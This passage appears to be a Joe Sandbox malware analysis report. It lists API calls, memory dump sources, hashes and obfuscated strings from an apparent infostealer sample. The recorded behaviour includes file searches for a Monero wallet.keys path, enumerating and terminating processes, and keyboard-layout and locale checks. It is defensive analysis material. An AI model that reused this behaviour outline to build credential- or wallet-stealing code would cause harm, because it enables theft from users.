                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D515A8,00D50BAF), ref: 00D3DBEB
                                      • StrCmpCA.SHLWAPI(?,00D515AC), ref: 00D3DC33
                                      • StrCmpCA.SHLWAPI(?,00D515B0), ref: 00D3DC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3DECC
                                      • FindClose.KERNEL32(000000FF), ref: 00D3DEDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: a343413d82ae9b3ff5b6d083cf3fbac5932a9b52e547abbeda6dec243b7edc62
                                      • Instruction ID: 28bb93b2946d8f3dc044907221c48a64bf2a89414d71f3717d0d28c6ad966276
                                      • Opcode Fuzzy Hash: a343413d82ae9b3ff5b6d083cf3fbac5932a9b52e547abbeda6dec243b7edc62
                                      • Instruction Fuzzy Hash: 5D914272A001149BDB14FF74ED969ED733EEF94340F004569F94A96185EE34AB08CBB2
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D49905
                                      • Process32First.KERNEL32(00D39FDE,00000128), ref: 00D49919
                                      • Process32Next.KERNEL32(00D39FDE,00000128), ref: 00D4992E
                                      • StrCmpCA.SHLWAPI(?,00D39FDE), ref: 00D49943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D4995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D4997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00D49987
                                      • CloseHandle.KERNEL32(00D39FDE), ref: 00D49993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 535db8d7a098ed20ecd486f32325b9e68f052a62abd2bfaf4207adc5234cd2c6
                                      • Instruction ID: f1b6a10717ca151d9129fc5a6d91aa91426dcd77a26a2d3aa36cf0977f8ce2be
                                      • Opcode Fuzzy Hash: 535db8d7a098ed20ecd486f32325b9e68f052a62abd2bfaf4207adc5234cd2c6
                                      • Instruction Fuzzy Hash: A8113375910208EBCB25DFA5DC48BDEB779BB48700F00458CF585A7284D779AB84CFA0
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,00D505B7), ref: 00D47D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00D47D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00D47D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D47DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00D47EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: f882e491c936a1d7822d5d931f75d882d247420bdbd4cfab9e45a9fae5d5bef8
                                      • Instruction ID: 0e3c588aae7a9771ddb239d88c03e19c17f0269be6d3c2941bde111c439fcc63
                                      • Opcode Fuzzy Hash: f882e491c936a1d7822d5d931f75d882d247420bdbd4cfab9e45a9fae5d5bef8
                                      • Instruction Fuzzy Hash: 81411A71940218ABDB24DF98DC99BEEB778FB44700F2041D9E50A66281DB746F88CFB1
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00D50D79), ref: 00D3E5A2
                                      • StrCmpCA.SHLWAPI(?,00D515F0), ref: 00D3E5F2
                                      • StrCmpCA.SHLWAPI(?,00D515F4), ref: 00D3E608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3ECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      • Opcode ID: 501271cecc0a2089052dd284233d1835da36b9177a6cbd2240c118437f929df8
                                      • Instruction ID: bf4eb1dd8cee638e4f637b174490925ed8ca55ab98fc7947fce44f4d5e68c139
                                      • Opcode Fuzzy Hash: 501271cecc0a2089052dd284233d1835da36b9177a6cbd2240c118437f929df8
                                      • Instruction Fuzzy Hash: 0A121D76A501189BEB14FB64DDA6AEE7339EF54300F4045E9B50A62091EF346F48CFB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: EQp$RBwo$YWj$jxg$u9_$n
                                      • API String ID: 0-1191438222
                                      • Opcode ID: bfe19114aee5d563e579ec6762ab5dc5d4207f6ae7c2c54ba5d81645e874ab67
                                      • Instruction ID: a6bd27328b40b7878d5a20d9d8cf952183a489d3c64363febce8a048104c188c
                                      • Opcode Fuzzy Hash: bfe19114aee5d563e579ec6762ab5dc5d4207f6ae7c2c54ba5d81645e874ab67
                                      • Instruction Fuzzy Hash: B4B229F360C204AFE308AE2DEC8567AFBD9EF94720F16853DE6C5C7744EA3558018696
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: *@}{$+l}_$,M*($J_o$d0aW$JD
                                      • API String ID: 0-2479629521
                                      • Opcode ID: b29de0ebcc7296009acaf306a26ce7fc0b60650a5fcb71389e8b5279f970521a
                                      • Instruction ID: a78eaa94c672e1ee5e255aec7438f999a90a44deceae7f206da7f33537f4e6af
                                      • Opcode Fuzzy Hash: b29de0ebcc7296009acaf306a26ce7fc0b60650a5fcb71389e8b5279f970521a
                                      • Instruction Fuzzy Hash: 1AB208F360C2049FE304AE2DEC8567AFBE9EF94720F1A853DEAC5C3744E63558058696
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: E?~$E?~$p_{$y {>$xw|$xw|
                                      • API String ID: 0-3861228067
                                      • Opcode ID: a9b836dd127380245a01ee22c81b139f97071f000dd7441fe10956b5cbb9508b
                                      • Instruction ID: 1d6fa6819fd191e89bc76c3eca5af569799d41242ffa58fdea0ce44fadfe7347
                                      • Opcode Fuzzy Hash: a9b836dd127380245a01ee22c81b139f97071f000dd7441fe10956b5cbb9508b
                                      • Instruction Fuzzy Hash: D8B2F6F360C214AFE304AE29EC8567AFBE9EF94720F16493DEAC4C7340E67558418697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: !EW:$+6_$[3]}$ck_u$[i
                                      • API String ID: 0-2810132593
                                      • Opcode ID: 539974bd87a752543092940c8fba427dd457855cc22419e53a7623c78d440f6d
                                      • Instruction ID: 7e5bd1dedcb4d71cc306f3e9695382beb5d0aeb24a1dc70ce38e8d201091b51c
                                      • Opcode Fuzzy Hash: 539974bd87a752543092940c8fba427dd457855cc22419e53a7623c78d440f6d
                                      • Instruction Fuzzy Hash: 2BB21AF3A0C2049FE304AE2DEC8567AF7E9EBD4720F16893DE6C4C3744E97558058696
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: (J@$3un$oOq|$~(x}$i{
                                      • API String ID: 0-3234530343
                                      • Opcode ID: 4528494a2db5b72f005e5c004209d02b1d603eacc69013bbe57dffcb7388cbea
                                      • Instruction ID: 5e483ca2a8357828e668efb037d5403f0b9c94579d0fe3bc2c2f80d48c8452ba
                                      • Opcode Fuzzy Hash: 4528494a2db5b72f005e5c004209d02b1d603eacc69013bbe57dffcb7388cbea
                                      • Instruction Fuzzy Hash: 72A2D6F3608204AFE3046E29EC85B7AFBE9EF94720F16493DE6C4C7744E63598058697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction ID: c669c2db2fe2ca561d4a7363d865115cd8bd4c9e7262e53a7c89922d94fbd64d
                                      • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction Fuzzy Hash: 4D419112E19BC9C5CB058B7444A02AEBFB26FD6210F6D42EAC4DD5F382C774854AD3B5
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C97C
                                      • lstrcat.KERNEL32(?,00D50B47), ref: 00D3CA43
                                      • lstrcat.KERNEL32(?,00D50B4B), ref: 00D3CA57
                                      • lstrcat.KERNEL32(?,00D50B4E), ref: 00D3CA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: 145af8f3c2f081dddfc1636022dd35a1377da1457587e07fb887248855242538
                                      • Instruction ID: 0e5ab5caadfb23e414ba0fccf6dc59c27266526a9d28364b76e72c90bf9fd74e
                                      • Opcode Fuzzy Hash: 145af8f3c2f081dddfc1636022dd35a1377da1457587e07fb887248855242538
                                      • Instruction Fuzzy Hash: D641417590421DDFDB20CFA4DD89BFEB7B8AB48704F1041A8F549A7280D7796A84CFA1
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00D46C0C
                                      • sscanf.NTDLL ref: 00D46C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D46C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D46C60
